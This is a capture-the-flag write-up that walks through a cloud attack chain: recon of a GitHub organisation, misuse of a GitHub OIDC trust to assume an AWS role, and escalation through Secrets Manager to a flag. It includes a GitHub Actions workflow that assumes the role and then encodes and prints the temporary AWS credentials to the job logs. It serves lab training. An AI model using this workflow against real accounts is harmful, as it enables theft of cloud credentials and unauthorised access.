Action Theft Repo

Viewing the s3 bucket, there were reference to a github organization url https://github.com/HEXNOVA404

Manually enumerating the github organization, we found a github action logs that leaked out the role name. https://github.com/HEXNOVA404/Organisation-Vault/actions/runs/16701033362/job/47272191258

Decoding the role arn and secret id.

arn:aws:iam::170974506515:role/github-deployment-role
internal/secrets/id-v2

Based on the challenge description, we know the attacker managed to assume the role, access secrets manager and priv esc to a different role. There is also mention of github gist in the hint so lets take a look at that.

In the github gist, we found a internal access policy document at https://gist.github.com/HEXNOVA404/22afdb23005985e378def7ed7bf0da51

From this we have the full attack chain.

Exploit Github OIDC to assume the arn:aws:iam::170974506515:role/github-deployment-role rople
Retrieve the secrets at internal/secrets/id-v2
Use the secrets external id to assume the prod-readonly-auditor role
Retrieve the flag at ci-deployment-logsv1

I created a private github repo and setup the github actions as such.

name: Deploy to Prod
on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  tf:
    name: Run Terraform
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - name: Auth to AWS
        uses: aws-actions/configure-aws-credentials@v4
        with:
          aws-region: us-west-2
          role-to-assume: arn:aws:iam::170974506515:role/github-deployment-role
          role-external-id: extidHX9F3A1
      - name: Encode creds for export
        run: |
          KEY_ID=$(echo -n "$AWS_ACCESS_KEY_ID" | gzip -c | base64)
          SECRET_KEY=$(echo -n "$AWS_SECRET_ACCESS_KEY" | gzip -c | base64)
          SESSION_TOKEN=$(echo -n "$AWS_SESSION_TOKEN" | gzip -c | base64)

          echo "$KEY_ID"
          echo "$SECRET_KEY"
          echo "$SESSION_TOKEN"